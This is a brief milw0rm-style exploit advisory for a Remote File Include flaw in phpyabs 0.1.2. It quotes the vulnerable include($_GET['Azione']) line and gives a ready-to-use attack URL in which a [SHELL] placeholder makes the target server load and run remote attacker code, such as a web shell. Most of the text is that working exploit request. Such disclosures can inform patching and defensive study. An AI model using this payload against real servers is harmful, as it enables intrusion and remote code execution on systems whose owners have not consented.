******************************************************************************** phpyabs 0.1.2 RFI Vulnerability ******************************************************************************** FOUND BY: Arka69 BUG: Remote File Include (RFI) CMS: phpyabs 0.1.2 SITE: http://exploita.altervista.org ******************************************************************************** VULNERABLE CODE: (phpyabs/moduli/libri/index.php) include($_GET['Azione'].".php"); ******************************************************************************** RFI: http://victim.com/phpyabs/moduli/libri/index.php?Azione=[SHELL] # milw0rm.com [2009-02-06]